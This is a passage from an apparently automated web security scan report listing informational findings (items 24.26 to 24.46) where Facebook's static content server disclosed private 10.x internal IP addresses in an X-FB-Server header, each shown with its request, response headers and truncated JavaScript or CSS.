24.26. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4M_1PP4LZN8.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y3/r/4M_1PP4LZN8.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y3/r/4M_1PP4LZN8.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Wed, 13 Jul 2011 23:03:47 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Content-Length: 178258
Vary: Accept-Encoding
Cache-Control: public, max-age=31130033
Expires: Fri, 13 Jul 2012 21:38:16 GMT
Date: Tue, 19 Jul 2011 14:24:23 GMT
Connection: close

/*1310679583,169776067*/

if (window.CavalryLogger) { CavalryLogger.start_js(["fbhRl"]); }

function hasArrayNature(a){return (!!a&&(typeof a=='object'||typeof a=='function')&&('length' in a)&&!('setI
...[SNIP]...

24.27. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/Q3Oe8zcURw5.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y3/r/Q3Oe8zcURw5.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y3/r/Q3Oe8zcURw5.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 05 Jul 2011 20:02:50 GMT
X-FB-Server: 10.138.17.186
Vary: Accept-Encoding
Content-Length: 686
Cache-Control: public, max-age=30805758
Expires: Tue, 10 Jul 2012 04:07:04 GMT
Date: Tue, 19 Jul 2011 14:57:46 GMT
Connection: close

/*1310357211,176820666*/

.sp_4z4tic{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zS/r/3IAp8xOfnnE.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_a595
...[SNIP]...

24.28. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/ts_55XkdiUP.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y3/r/ts_55XkdiUP.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y3/r/ts_55XkdiUP.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Sat, 09 Jul 2011 20:40:01 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 4980
Vary: Accept-Encoding
Cache-Control: public, max-age=30804480
Expires: Tue, 10 Jul 2012 03:45:15 GMT
Date: Tue, 19 Jul 2011 14:57:15 GMT
Connection: close

/*1310355913,169775813*/

if (window.CavalryLogger) { CavalryLogger.start_js(["dfQwr"]); }

function scribe_log(a,b){new AsyncSignal('/ajax/scribe_log.php',{category:a,message:b}).send();}function tex
...[SNIP]...

24.29. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/v3Y9Tu0WZkw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y3/r/v3Y9Tu0WZkw.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y3/r/v3Y9Tu0WZkw.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 13 Jun 2011 01:53:31 GMT
X-FB-Server: 10.138.16.185
Content-Length: 14325
Vary: Accept-Encoding
Cache-Control: public, max-age=28388188
Expires: Tue, 12 Jun 2012 04:33:43 GMT
Date: Tue, 19 Jul 2011 14:57:15 GMT
Connection: close

/*1307939603,176820409*/

if (window.CavalryLogger) { CavalryLogger.start_js(["LVwPS"]); }

function captchaRefresh(d,e,f,a,b){var c={new_captcha_type:d,id:f,t_auth_token:a};c.skipped_captcha_data=$('
...[SNIP]...

24.30. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/SK9j5prLTwj.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y4/r/SK9j5prLTwj.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y4/r/SK9j5prLTwj.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:11:12 GMT
X-FB-Server: 10.138.16.183
Content-Length: 2271
Vary: Accept-Encoding
Cache-Control: public, max-age=30807801
Expires: Tue, 10 Jul 2012 04:42:01 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1310359292,176820407*/

.marketingBodyCopy{line-height:19px}
h4.marketingBodyTitle{color:#333;font-weight:bold}
h4.marketingBodyTitleMedium{font-size: 14px}
h4.marketingBodyTitleLarge{font-size: 16p
...[SNIP]...

24.31. http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/wRBjYtc4wBS.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y4/r/wRBjYtc4wBS.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y4/r/wRBjYtc4wBS.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Sun, 07 Mar 2010 21:28:12 -0800
X-Powered-By: HPHP
X-FB-Server: 10.30.148.193
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 388
Cache-Control: public, max-age=20010758
Expires: Wed, 07 Mar 2012 05:29:53 GMT
Date: Tue, 19 Jul 2011 14:57:15 GMT
Connection: close

/*1299562092,169776321*/

if (window.CavalryLogger) { CavalryLogger.start_js(["DPZps"]); }

function reg_bootload(a,d,e,c,f){var b=function(g){Bootloader.loadComponents(['reg-util','editor'],function(
...[SNIP]...

24.32. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/-r69fEK9JXo.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y5/r/-r69fEK9JXo.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y5/r/-r69fEK9JXo.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/find-friends?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Sat, 09 Jul 2011 20:41:49 GMT
X-FB-Server: 10.30.146.198
X-Cnection: close
Content-Length: 34506
Vary: Accept-Encoding
Cache-Control: public, max-age=30803654
Expires: Tue, 10 Jul 2012 03:31:46 GMT
Date: Tue, 19 Jul 2011 14:57:32 GMT
Connection: close

/*1310355148,169775814*/

if (window.CavalryLogger) { CavalryLogger.start_js(["gh604"]); }

var NewHigh={reset:function(){this.initialized=false;},ensureInitialized:function(){if(this.initialized)retu
...[SNIP]...

24.33. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/D-4QGnNagV6.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y5/r/D-4QGnNagV6.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y5/r/D-4QGnNagV6.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:53:01 GMT
X-FB-Server: 10.138.17.183
Vary: Accept-Encoding
Content-Length: 463
Cache-Control: public, max-age=24210704
Expires: Tue, 24 Apr 2012 20:10:24 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1303762300,176820663*/

.navIdentity{min-height:38px;border-bottom:1px solid #e0e0e0;margin:5px;padding-bottom:5px}
#navAccount ul .navIdentityPic{float:left}
#navAccount ul .navIdentityPic img{widt
...[SNIP]...

24.34. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/q30FbKmaBid.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y5/r/q30FbKmaBid.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y5/r/q30FbKmaBid.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/help/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 13 Jul 2011 23:02:22 GMT
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 5937
Vary: Accept-Encoding
Cache-Control: public, max-age=31059182
Expires: Fri, 13 Jul 2012 02:30:58 GMT
Date: Tue, 19 Jul 2011 14:57:56 GMT
Connection: close

/*1310610659,169776321*/

.HC_Page_Header{color:#1c2a47;font-size: 16px;padding:6px 0 16px}
.HC_Center{float:left;width:520px}
.HC_Center .uiHeader h2 a{color:#3b5998}
.HC_Header .HC_LikeButton{border
...[SNIP]...

24.35. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y6/r/hbbyfqQ4R56.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y6/r/hbbyfqQ4R56.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:08:28 GMT
X-FB-Server: 10.30.146.195
X-Cnection: close
Content-Length: 7575
Vary: Accept-Encoding
Cache-Control: public, max-age=30803437
Expires: Tue, 10 Jul 2012 03:27:51 GMT
Date: Tue, 19 Jul 2011 14:57:14 GMT
Connection: close

/*1310354861,169775811*/

.sp_3f7gkk{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z0/r/GqzvwjakvBj.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_a358
...[SNIP]...

24.36. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/zOMloODzDF_.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y6/r/zOMloODzDF_.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y6/r/zOMloODzDF_.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 06 Jun 2011 02:34:20 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Content-Length: 1250
Vary: Accept-Encoding
Cache-Control: public, max-age=27783454
Expires: Tue, 05 Jun 2012 04:36:18 GMT
Date: Tue, 19 Jul 2011 14:58:44 GMT
Connection: close

/*1307334899,169776320*/

.fbPhotosCloseButton{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/bLZF2p2jXNV.png)}
.fbPhotosCloseButtonSmall{background-image:url(http://static.ak.fbcdn.
...[SNIP]...

24.37. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/BDfYGSOIQq_.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y7/r/BDfYGSOIQq_.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y7/r/BDfYGSOIQq_.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/careers/?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 05 Jul 2011 20:02:50 GMT
X-FB-Server: 10.138.69.186
Vary: Accept-Encoding
Content-Length: 918
Cache-Control: public, max-age=30932287
Expires: Wed, 11 Jul 2012 15:15:58 GMT
Date: Tue, 19 Jul 2011 14:57:51 GMT
Connection: close

/*1310483758,176833978*/

.sp_1wakkz{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zU/r/QD3_2hVZ0xn.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_0ea9
...[SNIP]...

24.38. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/KZtmMbNS3_L.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y7/r/KZtmMbNS3_L.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y7/r/KZtmMbNS3_L.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 23 May 2011 23:00:02 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 485
Cache-Control: public, max-age=26893755
Expires: Fri, 25 May 2012 21:27:55 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1306445192,169776067*/

.canvas_error_page h3.error_details{color:#555;font-size: 11px;font-weight:normal;margin:0;padding:10px 0 0 0}
.canvas_error_page p{line-height:16px;margin:10px 0 15px 0}
.ca
...[SNIP]...

24.39. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/VXhD5_PgFOo.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y7/r/VXhD5_PgFOo.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y7/r/VXhD5_PgFOo.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:03:30 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 9709
Vary: Accept-Encoding
Cache-Control: public, max-age=30815730
Expires: Tue, 10 Jul 2012 06:53:47 GMT
Date: Tue, 19 Jul 2011 14:58:17 GMT
Connection: close

/*1310367353,169776317*/

.interaction_form div.dialog_content{border-width:0}
.interaction_dialog_body{border-bottom:1px solid #ccc}
.interaction_form_body{padding:0;border-bottom:none}
.interaction_
...[SNIP]...

24.40. http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ubbnH6M9ljE.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y7/r/ubbnH6M9ljE.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y7/r/ubbnH6M9ljE.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 01:57:23 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 605
Cache-Control: public, max-age=30201026
Expires: Tue, 03 Jul 2012 04:09:06 GMT
Date: Tue, 19 Jul 2011 14:58:40 GMT
Connection: close

/*1309752508,169775813*/

.sp_er2zt1{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/-254oo3IVe-.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_cf65
...[SNIP]...

24.41. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/-Ho_EIT75He.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y8/r/-Ho_EIT75He.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y8/r/-Ho_EIT75He.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Jul 2011 02:21:38 GMT
X-FB-Server: 10.138.16.184
Content-Length: 4729
Vary: Accept-Encoding
Cache-Control: public, max-age=30198592
Expires: Tue, 03 Jul 2012 03:27:35 GMT
Date: Tue, 19 Jul 2011 14:57:43 GMT
Connection: close

/*1309750081,176820408*/

.text_exposed_root{display:inline}
.text_exposed .text_exposed_show{display:inline}
.text_exposed_show,
.text_exposed .text_exposed_hide{display:none}
.text_exposed_link{font
...[SNIP]...

24.42. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/2oQd79CdXv7.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y8/r/2oQd79CdXv7.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y8/r/2oQd79CdXv7.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 01:50:38 GMT
X-FB-Server: 10.30.146.196
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 495
Cache-Control: public, max-age=30813264
Expires: Tue, 10 Jul 2012 06:12:12 GMT
Date: Tue, 19 Jul 2011 14:57:48 GMT
Connection: close

/*1310364742,169775812*/

.sp_7oewf3{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z-/r/ukvLMiNkr_t.png);background-repeat:no-repeat;display:inline-block;height:13px;width:13px}
.sx_74e6
...[SNIP]...

24.43. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Dg8YLPWKyk7.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y8/r/Dg8YLPWKyk7.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y8/r/Dg8YLPWKyk7.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Fri, 01 Apr 2011 15:54:26 GMT
X-FB-Server: 10.30.147.193
X-Cnection: close
Vary: Accept-Encoding
Content-Length: 581
Cache-Control: public, max-age=30197458
Expires: Tue, 03 Jul 2012 03:09:41 GMT
Date: Tue, 19 Jul 2011 14:58:43 GMT
Connection: close

/*1309748911,169776065*/

.uiVideoLink{background-color:#000;display:-moz-inline-box;display:inline-block;padding:4px 0;position:relative}
.uiVideoLink:hover{text-decoration:none}
.uiVideoLink i{backg
...[SNIP]...

24.44. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/SNrGdWeoQHs.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y8/r/SNrGdWeoQHs.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y8/r/SNrGdWeoQHs.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/privacy/explanation.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 11 Jul 2011 02:08:28 GMT
X-FB-Server: 10.138.16.183
Content-Length: 1403
Vary: Accept-Encoding
Cache-Control: public, max-age=30807762
Expires: Tue, 10 Jul 2012 04:40:36 GMT
Date: Tue, 19 Jul 2011 14:57:54 GMT
Connection: close

/*1310359292,176820407*/

.sp_8mn0mc{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zY/r/6HL8HSM452G.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_4155
...[SNIP]...

24.45. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/PVBa_VtP99O.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y9/r/PVBa_VtP99O.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y9/r/PVBa_VtP99O.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/facebook
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 04 Apr 2011 01:52:16 GMT
X-FB-Server: 10.138.64.185
Vary: Accept-Encoding
Content-Length: 891
Cache-Control: public, max-age=22398513
Expires: Tue, 03 Apr 2012 20:46:21 GMT
Date: Tue, 19 Jul 2011 14:57:48 GMT
Connection: close

/*1301949888,176832697*/

.fbQuestionsBlingBox{padding:3px 4px;margin-left:-1px;margin-right:-1px;color:#3B5998 !important}
.fbQuestionsBlingBox:hover{text-decoration:none;background-color:#eceff5;bor
...[SNIP]...

24.46. http://static.ak.fbcdn.net/rsrc.php/v1/yA/r/C9intiNq_3N.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yA/r/C9intiNq_3N.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yA/r/C9intiNq_3N.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2
